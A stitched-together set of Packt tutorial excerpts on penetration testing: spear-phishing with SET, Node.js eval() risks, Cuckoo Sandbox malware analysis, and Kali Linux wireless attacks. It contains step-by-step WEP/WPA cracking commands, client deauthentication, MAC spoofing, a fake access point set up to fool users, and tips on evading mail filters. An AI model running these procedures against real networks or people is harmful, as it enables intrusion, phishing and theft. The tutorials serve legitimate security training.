    WEBATTACK_SSL=OFF

The following setting can be used to build a self-signed certificate for web attacks, but there will be a warning message saying Untrusted certificate. Hence, it is recommended to use this option wisely to avoid alerting the target user:

    # PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED)
    # YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT
    # IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED!
    #
    SELF_SIGNED_CERT=OFF

The following setting is used to enable or disable the Metasploit listener once the attack is executed:

    # DISABLES AUTOMATIC LISTENER - TURN THIS OFF IF YOU DON'T WANT A METASPLOIT LISTENER IN THE BACKGROUND.
    AUTOMATIC_LISTENER=ON

The following configuration will allow you to use SET as a standalone toolkit without using Metasploit functionalities, but it is always recommended to use Metasploit along with SET in order to increase the penetration testing performance:

    # THIS WILL DISABLE THE FUNCTIONALITY IF METASPLOIT IS NOT INSTALLED AND YOU JUST WANT TO USE SETOOLKIT OR RATTE FOR PAYLOADS
    # OR THE OTHER ATTACK VECTORS.
    METASPLOIT_MODE=ON

These are a few of the important configuration settings available for SET. Proper knowledge of the config file is essential to gain full control over SET (a small illustrative reader for this key/value format appears at the end of this article).

How it works...

The SET config file is the heart of the toolkit, as it contains the default values that SET will pick while performing various attack vectors. A misconfigured SET file can lead to errors during the operation, so it is essential to understand the details defined in the config file in order to get the best results. The How to do it... section clearly reflects the ease with which we can understand and manage the config file.

Working with the spear-phishing attack vector

A spear-phishing attack vector is an e-mail attack scenario that is used to send malicious mails to target/specific user(s). In order to spoof your own e-mail address, you will require a sendmail server. Change the config setting to SENDMAIL=ON. If you do not have sendmail installed on your machine, then it can be downloaded by entering the following command:

    root@bt:~# apt-get install sendmail
    Reading package lists... Done

Getting ready

Before we move ahead with a phishing attack, it is imperative for us to know how the e-mail system works. Recipient e-mail servers, in order to mitigate these types of attacks, deploy gray-listing, SPF record validation, RBL verification, and content verification. These verification processes ensure that a particular e-mail arrived from the same e-mail server as its domain. For example, if a spoofed e-mail address, <[email protected]>, arrives from the IP 202.145.34.23, it will be marked as malicious, as this IP address does not belong to Gmail. Hence, in order to bypass these security measures, the attacker should ensure that the server IP is not present in the RBL/SURL list.
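To make that last point concrete, the checks mentioned above include DNS-based blocklists (RBLs). The following minimal Python sketch, which is not part of SET, shows how a sending IP can be checked against one such list; the zone name is just an example and any DNSBL is queried the same way:

    # Check whether an IP address is listed on a DNS-based blocklist (DNSBL).
    import socket

    def is_listed(ip, zone="zen.spamhaus.org"):
        # 1.2.3.4 is queried as 4.3.2.1.<zone>
        query = ".".join(reversed(ip.split("."))) + "." + zone
        try:
            socket.gethostbyname(query)   # an A record answer means the IP is listed
            return True
        except socket.gaierror:           # no answer (NXDOMAIN) means it is not listed
            return False

    print(is_listed("127.0.0.2"))  # DNSBL test address, conventionally always listed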
As the spear-phishing attack relies heavily on user perception, the attacker should conduct a recon of the content that is being sent and should ensure that the content looks as legitimate as possible. Spear-phishing attacks are of two types: web-based content and payload-based content.

How to do it...

The spear-phishing module has three different attack vectors at our disposal. Let's analyze each of them.

Passing the first option will start our mass-mailing attack. The attack vector starts with selecting a payload. You can select any vulnerability from the list of available Metasploit exploit modules. Then, we will be prompted to select a handler that can connect back to the attacker. The options will include setting the VNC server or executing the payload and starting the command line, and so on. The next few steps will be starting the sendmail server, setting a template for a malicious file format, and selecting a single or mass-mail attack. Finally, you will be prompted to either choose a known mail service, such as Gmail or Yahoo, or use your own server:

    1. Use a gmail Account for your email attack.
    2. Use your own server or open relay
    set:phishing>1
    set:phishing> From address (ex: [email protected]):[email protected]
    set:phishing> Flag this message/s as high priority? [yes|no]:y

Setting up your own server cannot be very reliable, as most of the mail services follow a reverse lookup to make sure that the e-mail was generated from the same domain name as the address name.

Let's analyze another attack vector of spear-phishing. Creating a file format payload is another attack vector in which we can generate a file format with a known vulnerability and send it via e-mail to attack our target. It is preferred to use MS Word-based vulnerabilities, as it is difficult to detect whether such documents are malicious or not, so they can be sent as an attachment via an e-mail:

    set:phishing> Setup a listener [yes|no]:y
    [-] ***
    [-] * WARNING: Database support has been disabled
    [-] ***

At last, we will be prompted on whether we want to set up a listener or not. The Metasploit listener will begin and we will wait for the user to open the malicious file and connect back to the attacking system. The success of e-mail attacks depends on the e-mail client that we are targeting. So, a proper analysis of this attack vector is essential.

How it works...

As discussed earlier, the spear-phishing attack vector is a social engineering attack vector that targets specific users. An e-mail is sent from the attacking machine to the target user(s). The e-mail will contain a malicious attachment, which will exploit a known vulnerability on the target machine and provide shell connectivity to the attacker. SET automates the entire process. The major role that social engineering plays here is setting up a scenario that looks completely legitimate to the target, fooling the target into downloading the malicious file and executing it.
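Finally, returning to the set_config file discussed earlier in this article: it is a plain series of KEY=VALUE lines with # comments. The following short Python reader is purely illustrative (SET parses its own configuration internally) and simply prints a few of the flags covered above:

    # Illustrative reader for SET's key/value configuration format.
    def read_set_config(path="/pentest/exploits/set/config/set_config"):
        settings = {}
        with open(path) as f:
            for line in f:
                line = line.strip()
                # Skip blank lines, comments, and anything that is not KEY=VALUE.
                if not line or line.startswith("#") or "=" not in line:
                    continue
                key, _, value = line.partition("=")
                settings[key.strip()] = value.strip()
        return settings

    config = read_set_config()
    for flag in ("SELF_SIGNED_APPLET", "APACHE_SERVER", "AUTOMATIC_LISTENER"):
        print(flag, "=", config.get(flag))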

General Considerations

Packt
25 Oct 2013
9 min read
(For more resources related to this topic, see here.)

Building secure Node.js applications will require an understanding of the many different layers that it is built upon. Starting from the bottom, we have the language specification that defines what JavaScript consists of. Next, the virtual machine executes your code and may have differences from the specification. Following that, the Node.js platform and its API have details in their operation that affect your applications. Lastly, third-party modules interact with our own code and need to be audited for secure programming practices.

First, JavaScript's official name is ECMAScript. The international European Computer Manufacturers Association (ECMA) first standardized the language as ECMAScript in 1997. This ECMA-262 specification defines what comprises JavaScript as a language, including its features, and even some of its bugs. Even some of its general quirkiness has remained unchanged in the specification to maintain backward compatibility. While I won't say the specification itself is required reading, I will say that it is worth considering.

Second, Node.js uses Google's V8 virtual machine to interpret and execute your source code. While developing for the browser, you have to consider all the other virtual machines (not to mention versions) when it comes to available features. In a Node.js application, your code only runs on the server, so you have much more freedom, and you can use all the features available to you in V8. Additionally, you can also optimize for the V8 engine exclusively.

Next, Node.js handles setting up the event loop, and it takes your code to register callbacks for events and executes them accordingly. There are some important details regarding how Node.js responds to exceptions and other errors that you will need to be aware of while developing your applications.

Atop Node.js is the developer API. This API is written mostly in JavaScript, which allows you, as a JavaScript developer, to read it for yourself and understand how it works. There are many provided modules that you will likely end up using, and it's important for you to know how they work, so you can code defensively.

Last, but not least, the third-party modules that npm gives you access to are in great abundance, which can be a double-edged sword. On one hand, you have many options to pick from that suit your needs. On the other hand, third-party code is a potential security liability, as you will be expected to support and audit each of these modules (in addition to their own dependencies) for security vulnerabilities.

JavaScript security

One of the biggest security risks in JavaScript itself, both on the client and now on the server, is the use of the eval() function. This function, and others like it, takes a string argument, which can represent an expression, statement, or a series of statements, and it is executed as any other JavaScript source code. This is demonstrated in the following code:

    // these variables are available to eval()'d code
    // assume these variables are user input from a POST request
    var a = req.body.a; // => 1
    var b = req.body.b; // => 2
    var sum = eval(a + "+" + b); // same as '1 + 2'

This code has full access to the current scope, and can even affect the global object, giving it an alarming amount of control. Let's look at the same code, but imagine if someone malicious sent arbitrary JavaScript code instead of a simple number. The result is shown in the following code:

    var a = req.body.a; // => 1
    var b = req.body.b; // => 2; console.log("corrupted");
    var sum = eval(a + "+" + b); // same as '1 + 2; console.log("corrupted");'

Due to how eval() is exploited here, we are witnessing a "remote code execution" attack! When executed directly on the server, an attacker could gain access to server files and databases. There are a few cases where eval() can be useful, but if user input is involved in any step of the process, it should likely be avoided at all costs!

There are other features of JavaScript that are functional equivalents to eval(), and should likewise be avoided unless absolutely necessary. First is the Function constructor that allows you to create a callable function from strings, as shown in the following code:

    // creates a function that returns the sum of 2 arguments
    var adder = new Function("a", "b", "return a + b");
    adder(1, 2); // => 3

While very similar to the eval() function, it is not exactly the same. This is because it does not have access to the current scope. However, it does still have access to the global object, and should be avoided whenever user input is involved.

If you find yourself in a situation where there is an absolute need to execute arbitrary code that involves user input, you do have one secure option. The Node.js platform's API includes a vm module that is meant to give you the ability to compile and run code in a sandbox, preventing manipulation of the global object and even the current scope. It should be noted that the vm module has many known issues and edge cases. You should read the documentation and understand all the implications of what you are doing to make sure you don't get caught off-guard. (For comparison, an analogous example in Python appears at the end of this article.)

ES5 features

ECMAScript 5 included an extensive batch of changes to JavaScript, including the following changes:

- Strict mode for removing unsafe features from the language.
- Property descriptors that give you control over object and property access.
- Functions for changing object mutability.

Strict mode

Strict mode changes the way JavaScript code runs in select cases. First, it causes errors to be thrown in cases that were silent before. Second, it removes and/or changes features that made optimizations for JavaScript engines either difficult or impossible. Lastly, it prohibits some syntax that is likely to show up in future versions of JavaScript. Additionally, strict mode is opt-in only, and can be applied either globally or for an individual function scope.

For Node.js applications, to enable strict mode globally, add the --use_strict command line flag while executing your program. While dealing with third-party modules that may or may not be using strict mode, this can potentially have negative side effects on your overall application. With that said, you could potentially make strict mode compliance a requirement for any audits on third-party modules.

Strict mode can be enabled by adding the "use strict" pragma at the beginning of a function, before any other expressions, as shown in the following code:

    function sayHello(name) {
        "use strict"; // enables strict mode for this function scope
        console.log("hello", name);
    }

In Node.js, all the required files are wrapped with a function expression that handles the CommonJS module API. As a result, you can enable strict mode for an entire file by simply putting the directive at the top of the file. This will not enable strict mode globally, as it would in an environment like the browser.

Strict mode makes many changes to the syntax and runtime behavior, but for the sake of brevity we will only discuss changes relevant to application security.

First, scripts run via eval() in strict mode cannot introduce new variables to the enclosing scope. This prevents leaking new and possibly conflicting variables into your code when you run eval(), as shown in the following code:

    "use strict";
    eval("var a = true");
    console.log(a); // ReferenceError thrown - a does not exist

In addition, the code run via eval() is not given access to the global object through its context. This is similar, if not related, to other changes for function scope, which will be explained shortly, but this is specifically important for eval(), as it can no longer use the global object to perform additional black magic.

It turns out that the eval() function is able to be overridden in JavaScript. It can be accomplished by creating a new global variable called eval and assigning something else to it, which could be malicious. Strict mode prohibits this type of operation. It is treated more like a language keyword than a variable, and attempting to modify it will result in a syntax error, as shown in the following code:

    // all of the examples below are syntax errors
    "use strict";
    eval = 1;
    ++eval;
    var eval;
    function eval() { }

Next, function objects are more tightly secured. Some common extensions to ECMAScript add the function.caller and function.arguments references to each function after it is invoked. Effectively, you can "walk" the call stack for a specific function by traversing these special references. This potentially exposes information that would normally appear to be out of scope. Strict mode simply makes these properties throw a TypeError exception while attempting to read or write them, as shown in the following code:

    "use strict";
    function restricted() {
        restricted.caller;    // TypeError thrown
        restricted.arguments; // TypeError thrown
    }

Next, arguments.callee is removed in strict mode (like function.caller and function.arguments shown previously). Normally, arguments.callee refers to the current function, but this magic reference also exposes a way to "walk" the call stack, and possibly reveal information that previously would have been hidden or out of scope. In addition, this object makes certain optimizations difficult or impossible for JavaScript engines. Thus, it also throws a TypeError exception when an access is attempted, as shown in the following code:

    "use strict";
    function fun() {
        arguments.callee; // TypeError thrown
    }

Lastly, functions executed with null or undefined as the context no longer coerce the global object as the context. This applies to eval() as we saw earlier, but goes further to prevent arbitrary access to the global object in other function invocations, as shown in the following code:

    "use strict";
    (function () {
        console.log(this); // => null
    }).call(null);

Strict mode can help make the code far more secure than before, but ECMAScript 5 also includes access control through the property descriptor APIs. A JavaScript engine has always had the capability to define property access, but ES5 includes these APIs to give that same power to application developers.

Summary

In this article, we examined the security features that apply generally to the language of JavaScript itself, including how to use static code analysis to check for many of the aforementioned pitfalls. Also, we looked at some of the inner workings of a Node.js application, and how it differs from typical browser development when it comes to security.

Resources for Article:

Further resources on this subject:
Setting up Node [Article]
So, what is Node.js? [Article]
Learning to add dependencies [Article]
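As a brief cross-language aside that is not part of the original article, the eval() risk discussed above is not unique to JavaScript. Python, which several other tools in this collection are written in, has the same trap and a safer counterpart in ast.literal_eval; the sketch below is illustrative only:

    # Python analogue of the eval() remote code execution risk described above.
    import ast

    user_input = "__import__('os').listdir('.')"   # attacker-controlled "number"

    # Dangerous: eval() will happily run arbitrary expressions, including imports.
    # print(eval(user_input))

    # Safer: ast.literal_eval only accepts plain literals and rejects everything else.
    try:
        value = ast.literal_eval(user_input)
    except (ValueError, SyntaxError):
        value = None                               # not a plain literal -> rejected
    print(value)                                   # None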

Submitting a malware Word document

Packt
18 Oct 2013
5 min read
(For more resources related to this topic, see here.)

We will submit a document dealing with Iran's Oil and Nuclear Situation. Perform the following steps:

1. Open a new tab in the terminal and type the following command:

    $ python utils/submit.py --platform windows --package doc "shares/Iran's Oil and Nuclear Situation.doc"

   In this case, the document is located inside the shares folder. You have to change the location based on where your document is. Please make sure you get a Success message, like the one in the preceding screenshot, with task ID 7 (the ID depends on how many times you have submitted malware).

2. Cuckoo will then start the latest snapshot of the virtual machine we've made. Windows will open the Word document. A warning pop-up window will appear as shown in the preceding screenshot. We assume that the users will not be aware of what that warning is, so we will choose the I recognize this content. Allow it to play. option and click on the Continue button.

3. Wait a moment until the malware document takes some action. The VM will close automatically after all the actions are finished by the malware document. Now, you will see the Cuckoo status, on the terminal tab where we started Cuckoo, as shown in the following screenshot:

We have now finished the submission process. Let's look at the subfolders of Cuckoo, in the storage/analyses/ path. There are some numbered folders in storage/analyses, which represent the analysis tasks inside the database. These folders are based on the task ID we have created before. So, do not be confused when you find folders other than 7. Just find the folder you were searching for based on the task ID. When you see the reporting folder, you will know that Cuckoo Sandbox will make several files in a dedicated directory. The following is an example of an analysis directory structure:

    |-- analysis.conf
    |-- analysis.log
    |-- binary
    |-- dump.pcap
    |-- memory.dmp
    |-- files
    |   |-- 1234567890
    |   `-- dropped.exe
    |-- logs
    |   |-- 1232.raw
    |   |-- 1540.raw
    |   `-- 1118.raw
    |-- reports
    |   |-- report.html
    |   |-- report.json
    |   |-- report.maec11.xml
    |   |-- report.metadata.xml
    |   `-- report.pickle
    `-- shots
        |-- 0001.jpg
        |-- 0002.jpg
        |-- 0003.jpg
        `-- 0004.jpg

Let us have a look at some of them in detail:

- analysis.conf: This is a configuration file automatically generated by Cuckoo to instruct its analyzer with some details about the current analysis. It is generally of no interest for the end user, as it is exclusively used internally by the sandbox.
- analysis.log: This is a log file generated by the analyzer and it contains a trace of the analysis execution inside the guest environment. It will report the creation of processes and files, and any errors that occurred during the execution.
- binary: This is the binary file we have submitted before.
- dump.pcap: This is the network dump file generated by tcpdump or any other corresponding network sniffer.
- memory.dmp: In case you enabled it, this file contains the full memory dump of the analysis machine.
- files: This directory contains all the files the malware operated on and that Cuckoo was able to dump.
- logs: This directory contains all the raw logs generated by Cuckoo's process monitoring.
- reports: This directory contains all the reports generated by Cuckoo.
- shots: This directory contains all the screenshots of the guest's desktop taken during the malware execution.

The contents are not always similar to what is mentioned. They depend on how Cuckoo Sandbox analyzes the malware, the kind of malware submitted, and its behavior.
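Since dump.pcap is a standard capture file, it can also be examined from a script before opening a full packet analyzer. The following is a minimal, purely illustrative sketch (not part of Cuckoo; it assumes the Scapy library is installed and that the analysis lives in storage/analyses/7) that counts the IP endpoints seen in the capture:

    # Count IP endpoints observed in Cuckoo's dump.pcap, similar to an endpoint summary.
    from collections import Counter
    from scapy.all import IP, rdpcap

    hosts = Counter()
    for packet in rdpcap("storage/analyses/7/dump.pcap"):
        if IP in packet:
            hosts[packet[IP].src] += 1
            hosts[packet[IP].dst] += 1

    # Print the five most frequently seen addresses.
    for address, count in hosts.most_common(5):
        print(address, count)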
After analyzing Iran's Oil and Nuclear Situation.doc, there will be four folders, namely files, logs, reports, and shots, and three files, namely analysis.log, binary, and dump.pcap, inside the storage/analyses/7 folder.

To learn more about the final result of executing the malware inside the guest OS, the most user-friendly option is to open the HTML report located inside the reports folder. There will be a file named report.html. We need to double-click it and open it in the web browser (the same folder also contains report.json; a short example of reading it appears at the end of this article). Another option to see the content of report.html is by using this command:

    $ lynx report.html

There are some tabs with information gathered by the Cuckoo Sandbox analyzer in your browser. In the File tab of your browser, you may see some interesting information. We can see this malware has been created by injecting a Word document containing nothing but a macro virus on Wednesday, November 9th, between 03:22 and 03:24 hours.

More interesting information is available in the Network tab, under Hosts Involved. Under the Hosts Involved option, there is a list of IP addresses, that is, 192.168.2.101, 192.168.2.255, and 192.168.2.100, which are the guest OS's IP, the network broadcast IP, and vmnet0's IP, respectively. Then, what about the public IP 208.115.230.76? This is the IP used by the malware to contact the server, which makes the analysis more interesting.

Now that we know the malware tries to make contact outside of the host, you must be wondering how it communicates with the server. For this, we can look at the contents of the dump.pcap file. To open the dump.pcap file, you should install a packet analyzer. In this article, we will use the Wireshark packet analyzer. Please make sure that you have installed Wireshark in your host OS, and then open the dump.pcap file using Wireshark. We can see the network activities of the malware in the preceding screenshot.

Summary

In this article, you have learned how to submit malware samples to Cuckoo Sandbox. This article also described an example of submitting a malicious MS Office Word document.

Resources for Article:

Further resources on this subject:
Big Data Analysis [Article]
GNU Octave: Data Analysis Examples [Article]
StyleCop analysis [Article]
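As noted above, the reports folder also contains report.json next to report.html, which makes scripted post-processing straightforward. The following minimal Python sketch is not part of Cuckoo and deliberately avoids assuming any particular key names; it simply loads the report and lists its top-level sections:

    # Load Cuckoo's JSON report and show which sections it contains.
    import json

    with open("storage/analyses/7/reports/report.json") as f:
        report = json.load(f)

    print("Top-level sections:", sorted(report.keys()))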

Wireless Attacks in Kali Linux

Packt
11 Oct 2013
13 min read
In this article, by Willie L. Pritchett, author of the Kali Linux Cookbook, we will learn about the various wireless attacks. These days, wireless networks are everywhere. With users being on the go like never before, having to remain stationary because of having to plug into an Ethernet cable to gain Internet access is not feasible. For this convenience, there is a price to be paid; wireless connections are not as secure as Ethernet connections. In this article, we will explore various methods for manipulating radio network traffic including mobile phones and wireless networks. We will cover the following topics in this article: Wireless network WEP cracking Wireless network WPA/WPA2 cracking Automating wireless network cracking Accessing clients using a fake AP URL traffic manipulation Port redirection Sniffing network traffic (For more resources related to this topic, see here.) Wireless network WEP cracking Wireless Equivalent Privacy, or WEP as it's commonly referred to, has been around since 1999 and is an older security standard that was used to secure wireless networks. In 2003, WEP was replaced by WPA and later by WPA2. Due to having more secure protocols available, WEP encryption is rarely used. As a matter of fact, it is highly recommended that you never use WEP encryption to secure your network! There are many known ways to exploit WEP encryption and we will explore one of those ways in this recipe. In this recipe, we will use the AirCrack suite to crack a WEP key. The AirCrack suite (or AirCrack NG as it's commonly referred to) is a WEP and WPA key cracking program that captures network packets, analyzes them, and uses this data to crack the WEP key. Getting ready In order to perform the tasks of this recipe, experience with the Kali terminal window is required. A supported wireless card configured for packet injection will also be required. In case of a wireless card, packet injection involves sending a packet, or injecting it onto an already established connection between two parties. Please ensure your wireless card allows for packet injection as this is not something that all wireless cards support. How to do it... Let's begin the process of using AirCrack to crack a network session secured by WEP. Open a terminal window and bring up a list of wireless network interfaces: airmon-ng Under the interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as mon0, please substitute it at every location where wlan0 is mentioned. Next, we need to stop the wlan0 interface and take it down so that we can change our MAC address in the next step. airmon-ng stop ifconfig wlan0 down Next, we need to change the MAC address of our interface. Since the MAC address of your machine identifies you on any network, changing the identity of our machine allows us to keep our true MAC address hidden. In this case, we will use 00:11:22:33:44:55. macchanger --mac 00:11:22:33:44:55 wlan0 Now we need to restart airmon-ng. airmon-ng start wlan0 Next, we will use airodump to locate the available wireless networks nearby. airodump-ng wlan0 A listing of available networks will begin to appear. Once you find the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right click your mouse, and select copy. Also, make note of the channel that the network is transmitting its signal upon. You will find this information in the Channel column. In this case, the channel is 10. 
Now we run airodump and copy the information for the selected BSSID to a file. We will utilize the following options: –c allows us to select our channel. In this case, we use 10. –w allows us to select the name of our file. In this case, we have chosen wirelessattack. –bssid allows us to select our BSSID. In this case, we will paste 09:AC:90:AB:78 from the clipboard. airodump-ng –c 10 –w wirelessattack --bssid 09:AC:90:AB:78 wlan0 A new terminal window will open displaying the output from the previous command.Leave this window open. Open another terminal window; to attempt to make an association, we will run aireplay, which has the following syntax: aireplay-ng -1 0 –a [BSSID] –h [our chosen MAC address] –e [ESSID] [Interface] aireplay-ng -1 0 -a 09:AC:90:AB:78 –h 00:11:22:33:44:55 –e backtrack wlan0 Next, we send some traffic to the router so that we have some data to capture. We use aireplay again in the following format: aireplay-ng -3 –b [BSSID] – h [Our chosen MAC address] [Interface] aireplay-ng -3 –b 09:AC:90:AB:78 –h 00:11:22:33:44:55 wlan0 Your screen will begin to fill with traffic. Let this process run for a minute or two until we have information to run the crack. Finally, we run AirCrack to crack the WEP key. aircrack-ng –b 09:AC:90:AB:78 wirelessattack.cap That's it! How it works... In this recipe, we used the AirCrack suite to crack the WEP key of a wireless network. AirCrack is one of the most popular programs for cracking WEP. AirCrack works by gathering packets from a wireless connection over WEP and then mathematically analyzing the data to crack the WEP encrypted key. We began the recipe by starting AirCrack and selecting our desired interface. Next, we changed our MAC address which allowed us to change our identity on the network and then searched for available wireless networks to attack using airodump. Once we found the network we wanted to attack, we used aireplay to associate our machine with the MAC address of the wireless device we were attacking. We concluded by gathering some traffic and then brute-forced the generated CAP file in order to get the wireless password. Wireless network WPA/WPA2 cracking WiFi Protected Access, or WPA as it's commonly referred to, has been around since 2003 and was created to secure wireless networks and replace the outdated previous standard, WEP encryption. In 2003, WEP was replaced by WPA and later by WPA2. Due to having more secure protocols available, WEP encryption is rarely used. In this recipe, we will use the AirCrack suite to crack a WPA key. The AirCrack suite (or AirCrack NG as it's commonly referred) is a WEP and WPA key cracking program that captures network packets, analyzes them, and uses this data to crack the WPA key. Getting ready In order to perform the tasks of this recipe, experience with the Kali Linux terminal windows is required. A supported wireless card configured for packet injection will also be required. In the case of a wireless card, packet injection involves sending a packet, or injecting it onto an already established connection between two parties. How to do it... Let's begin the process of using AirCrack to crack a network session secured by WPA. Open a terminal window and bring up a list of wireless network interfaces. airmon-ng Under the interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as mon0, please substitute it at every location where wlan0 is mentioned. Next, we need to stop the wlan0 interface and take it down. 
airmon-ng stop wlan0 ifconfig wlan0 down Next, we need to change the MAC address of our interface. In this case, we will use 00:11:22:33:44:55. macchanger --mac 00:11:22:33:44:55 wlan0 Now we need to restart airmon-ng. airmon-ng start wlan0 Next, we will use airodump to locate the available wireless networks nearby. airodump-ng wlan0 A listing of available networks will begin to appear. Once you find the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right-click, and select copy. Also, make note of the channel that the network is transmitting its signal upon. You will find this information in the Channel column. In this case, the channel is 10. Now we run airodump and copy the information for the selected BSSID to a file. We will utilize the following options: -c allows us to select our channel. In this case, we use 10. -w allows us to select the name of our file. In this case, we have chosen wirelessattack. --bssid allows us to select our BSSID. In this case, we will paste 09:AC:90:AB:78 from the clipboard. airodump-ng -c 10 -w wirelessattack --bssid 09:AC:90:AB:78 wlan0 A new terminal window will open displaying the output from the previous command. Leave this window open. Open another terminal window; to deauthenticate a connected client and force it to reconnect, so that we can capture the WPA handshake, we will run aireplay, which has the following syntax: aireplay-ng --deauth 1 -a [BSSID] -c [our chosen MAC address] [Interface]. This process may take a few moments. aireplay-ng --deauth 1 -a 09:AC:90:AB:78 -c 00:11:22:33:44:55 wlan0 Finally, we run AirCrack to crack the WPA key. The -w option allows us to specify the location of our wordlist. We will use the .cap file that we named earlier. In this case, the file's name is wirelessattack.cap. aircrack-ng -w ./wordlist.lst wirelessattack.cap That's it! How it works... In this recipe, we used the AirCrack suite to crack the WPA key of a wireless network. AirCrack is one of the most popular programs for cracking WPA. AirCrack works by gathering packets from a wireless connection over WPA, including the four-way handshake, and then brute-forcing passwords from a wordlist against the captured handshake until a match is found. We began the recipe by starting AirCrack and selecting our desired interface. Next, we changed our MAC address, which allowed us to change our identity on the network, and then searched for available wireless networks to attack using airodump. Once we found the network we wanted to attack, we used aireplay to deauthenticate a client of the wireless device we were attacking so that a handshake could be captured when it reconnected. We concluded by gathering some traffic and then brute-forced the generated CAP file in order to get the wireless password. Automating wireless network cracking In this recipe, we will use Gerix to automate a wireless network attack. Gerix is an automated GUI for AirCrack. Gerix comes installed by default on Kali Linux and will speed up your wireless network cracking efforts. Getting ready A supported wireless card configured for packet injection will be required to complete this recipe. In the case of a wireless card, packet injection involves sending a packet, or injecting it, onto an already established connection between two parties. How to do it... Let's begin the process of performing an automated wireless network crack with Gerix by downloading it. Use wget to download Gerix from the following location.
wget https://bitbucket.org/Skin36/gerix-wifi-cracker-pyqt4/downloads/gerix-wifi-cracker-master.rar Once the file has been downloaded, we now need to extract the data from the RAR file. unrar x gerix-wifi-cracker-master.rar Now, to keep things consistent, let's move the Gerix folder to the /usr/share directory with the other penetration testing tools. mv gerix-wifi-cracker-master /usr/share/gerix-wifi-cracker Let's navigate to the directory where Gerix is located. cd /usr/share/gerix-wifi-cracker To begin using Gerix, we issue the following command: python gerix.py Click on the Configuration tab. On the Configuration tab, select your wireless interface. Click on the Enable/Disable Monitor Mode button. Once Monitor mode has been enabled successfully, under Select Target Network, click on the Rescan Networks button. The list of targeted networks will begin to fill. Select a wireless network to target. In this case, we select a WEP encrypted network. Click on the WEP tab. Under Functionalities, click on the Start Sniffing and Logging button. Click on the subtab WEP Attacks (No Client). Click on the Start false access point authentication on victim button. Click on the Start the ChopChop attack button. In the terminal window that opens, answer Y to the Use this packet question. Once completed, copy the .cap file generated. Click on the Create the ARP packet to be injected on the victim access point button. Click on the Inject the created packet on victim access point button. In the terminal window that opens, answer Y to the Use this packet question. Once you have gathered approximately 20,000 packets, click on the Cracking tab. Click on the Aircrack-ng – Decrypt WEP Password button. That's it! How it works... In this recipe, we used Gerix to automate a crack on a wireless network in order to obtain the WEP key. We began the recipe by launching Gerix and enabling the monitoring mode interface. Next, we selected our victim from a list of attack targets provided by Gerix. After we started sniffing the network traffic, we then used Chop Chop to generate the CAP file. We concluded the recipe by gathering 20,000 packets and brute-forced the CAP file with AirCrack. With Gerix, we were able to automate the steps to crack a WEP key without having to manually type commands in a terminal window. This is an excellent way to quickly and efficiently break into a WEP secured network. Accessing clients using a fake AP In this recipe, we will use Gerix to create and set up a fake access point (AP). Setting up a fake access point gives us the ability to gather information on each of the computers that access it. People in this day and age will often sacrifice security for convenience. Connecting to an open wireless access point to send a quick e-mail or to quickly log into a social network is rather convenient. Gerix is an automated GUI for AirCrack. Getting ready A supported wireless card configured for packet injection will be required to complete this recipe. In the case of a wireless card, packet injection involves sending a packet, or injecting it onto an already established connection between two parties. How to do it... Let's begin the process of creating a fake AP with Gerix. Let's navigate to the directory where Gerix is located: cd /usr/share/gerix-wifi-cracker To begin using Gerix, we issue the following command: python gerix.py Click on the Configuration tab. On the Configuration tab, select your wireless interface. Click on the Enable/Disable Monitor Mode button. 
Once Monitor mode has been enabled successfully, under Select Target Network, click on the Rescan Networks button. The list of targeted networks will begin to fill. Select a wireless network to target. In this case, we select a WEP-encrypted network. Click on the Fake AP tab. Change the Access Point ESSID from honeypot to something less suspicious. In this case, we are going to use personalnetwork. We will use the defaults on each of the other options. To start the fake access point, click on the Start Fake Access Point button. That's it! How it works... In this recipe, we used Gerix to create a fake AP. Creating a fake AP is an excellent way of collecting information from unsuspecting users. Fake access points are a great tool to use because, to your victim, they appear to be a legitimate access point and are therefore trusted by the user. Using Gerix, we were able to automate the setup of a fake access point in a few short clicks.
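For readers who prefer the command line over the Gerix GUI, fake access points of this kind are typically created with airbase-ng, which ships with the aircrack-ng suite. The following Python sketch shows a rough equivalent of the setup above; it assumes a monitor-mode interface named wlan0 (substitute mon0 or whatever airmon-ng created on your system), the personalnetwork ESSID chosen earlier, and channel 10, and it is a sketch under those assumptions rather than a drop-in replacement for what Gerix configures.

import subprocess

MONITOR_INTERFACE = "wlan0"       # or mon0, depending on what airmon-ng created
FAKE_ESSID = "personalnetwork"    # the less suspicious name chosen in Gerix
CHANNEL = "10"                    # channel on which the fake AP will broadcast

# airbase-ng keeps running until interrupted, so launch it and wait
process = subprocess.Popen([
    "airbase-ng",
    "-e", FAKE_ESSID,    # ESSID to advertise
    "-c", CHANNEL,       # channel to use
    MONITOR_INTERFACE,
])
try:
    process.wait()
except KeyboardInterrupt:
    process.terminate()

Once airbase-ng is running, it creates a tap interface (at0 by default), and traffic from clients that associate with the fake access point can be examined there with standard sniffing tools.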

Penetration Testing and Setup

Packt
27 Sep 2013
35 min read
(For more resources related to this topic, see here.) Penetration Testing goes beyond an assessment by evaluating identified vulnerabilities to verify if the vulnerability is real or a false positive. For example, an audit or an assessment may utilize scanning tools that provide a few hundred possible vulnerabilities on multiple systems. A Penetration Test would attempt to attack those vulnerabilities in the same manner as a malicious hacker to verify which vulnerabilities are genuine reducing the real list of system vulnerabilities to a handful of security weaknesses. The most effective Penetration Tests are the ones that target a very specific system with a very specific goal. Quality over quantity is the true test of a successful Penetration Test. Enumerating a single system during a targeted attack reveals more about system security and response time to handle incidents than wide spectrum attack. By carefully choosing valuable targets, a Penetration Tester can determine the entire security infrastructure and associated risk for a valuable asset. This is a common misinterpretation and should be clearly explained to all potential customers. Penetration Testing evaluates the effectiveness of existing security. If a customer does not have strong security then they will receive little value from Penetration Testing services. As a consultant, it is recommended that Penetration Testing services are offered as a means to verify security for existing systems once a customer believes they have exhausted all efforts to secure those systems and are ready to evaluate if there are any existing gaps in securing those systems. Positioning a proper scope of work is critical when selling Penetration Testing services. The scope of work defines what systems and applications are being targeted as well as what toolsets may be used to compromise vulnerabilities that are found. Best practice is working with your customer during a design session to develop an acceptable scope of work that doesn't impact the value of the results. Web Penetration Testing with Kali Linux—the next generation of BackTrack —is a hands-on guide that will provide you step-by-step methods for finding 